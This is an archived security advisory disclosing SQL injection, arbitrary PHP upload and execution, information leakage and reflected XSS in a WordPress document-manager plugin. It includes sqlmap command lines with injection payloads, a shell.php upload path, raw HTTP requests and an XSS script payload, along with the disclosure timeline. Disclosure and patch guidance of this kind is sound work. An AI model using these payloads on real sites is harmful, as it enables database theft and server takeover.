Multiple vulnerabilities in Wordpress plugin SP Projects & Document Manager

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



* Exploit Title: Multiple Vulnerabilities in SP Projects & Document Manager
* Discovery Date: 2016/01/13
* Public Disclosure Date: 2016/03/06
* Exploit Author: Michael Helwig
* Contact: https://twitter.com/c0dmtr1x
* Vendor Homepage: http://smartypantsplugins.com/
* Software Link: https://de.wordpress.org/plugins/sp-client-document-manager/
* Version: 2.5.9.6
* Tested on: WordPress 4.4.1
* Category: webapps

Description
===============================================================================

The Wordpress plugin "SP Projects & Document Manager" contains several 
vulnerabilities: arbitrary file upload and code execution by registered users, 
sql injections, information leakage and xss by unregistered users.

PoC
===============================================================================


1. SQL-Injections
~~~~~~~~~~~~~~~~~~~

Several SQL injections have been known in version 2.4.1 but have been fixed in between.
At least two of them reappeared in version 2.5.9.6:

- The injections in the "id"-parameter on
http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/
ajax.php?function=download-project&id=1

- and the POST-Parameter vendor_email on
http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/
ajax.php?function=email-vendor

See https://packetstormsecurity.com/files/129212/\
 WordPress-SP-Client-Document-Manager-2.4.1-SQL-Injection.html 
for the original information on this.

Both injections can be exploited by sqlmap:

[1] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document\
 -manager/admin/ajax.php?function=download-project&id=1*" -p id --dbms mysql

[2] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document\
 -manager/admin/ajax.php?function=email-vendor" --data="vendor_email[]=0) \
  OR (1=1 *" --dbms mysql



2. Arbitrary code executions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Clients can upload PHP files (*.php, *.php5 etc.) and execute them via a GET 
request to their specific location in the default upload path (which can vary 
depending on the configuration of the plugin). The URL to uploaded files typically 
looks like

/wp-content/uploads/sp-client-document-manager/[UPLOADER-ID]/[FILE]

e.g.
http://wordpress.local.de/wp-content/uploads/sp-client-document-manager\
 /1/shell.php

Files can even be accessed directly if the option "Require Login to Download" 
is checked in the plugin configuration.


3. Information leakage
~~~~~~~~~~~~~~~~~~~~~~~

Information about uploaded files can be retrieved by non-logged in users via a 
call to admin/ajax.php:

-----------------------
GET http://wordpress.local.de/wp-content/plugins/sp-client-document-manager\
/admin/ajax.php?function=get-file-info&id=1

-- response --
200 OK
Date:  Wed, 13 Jan 2016 22:17:46 GMT
Server:  Apache/2.4.7 (Ubuntu)
X-Powered-By:  PHP/5.5.9-1ubuntu4.14
Expires:  Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control:  no-cache, must-revalidate
Pragma:  no-cache
Content-Length:  211
Connection:  close
Content-Type:  application/json

{"id":"1","name":"in.php","file":"index.php","notes":"","tags":"","uid":"1",\
"cid":"0","pid":"0","parent":"0","date":"2016-01-13 15:18:27","status":"0",\
"form_id":"0","entry_id":"0","group_id":"0","client_id":"0"}
---------------

Specifically you can retrieve info about the upload user id and filename 
to determine the URL for direct access to the file (see 3).

4. XSS Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~

There is a (non-persistent) XSS vulnerability in the admin/ajax.php file 
for function=email-vendor:

---------------
POST http://wordpress.local.de/wp-content/plugins/sp-client-document-manager\
 /admin/ajax.php?function=email-vendor
Content-Type: application/x-www-form-urlencoded
vendor_email[]=1&vendor=<script>alert(1);</script>

-- response --
200 OK
Date:  Sun, 06 Mar 2016 10:00:30 GMT
Server:  Apache/2.4.7 (Ubuntu)
X-Powered-By:  PHP/5.5.9-1ubuntu4.14
Expires:  Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control:  no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma:  no-cache
Vary:  Accept-Encoding
Content-Encoding:  gzip
Content-Length:  101
Keep-Alive:  timeout=5, max=100
Connection:  Keep-Alive
Content-Type:  text/html

<p style="color:green;font-weight:bold">Dateien gesendet an <script>alert(1);\
</script></p>
---------------


Timeline
===============================================================================

2016/01/13 - Issues discovered
2016/01/14 - Issues reported to vendor via contact form on his website
2016/01/27 - No response from vendor; WordPress security team notified
2016/01/29 - Reply from Wordpress security team
2016/03/02 - Vendor released security update 2.6.0.0 - issues fixed


Solution
===============================================================================
  
Update to latest version




[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux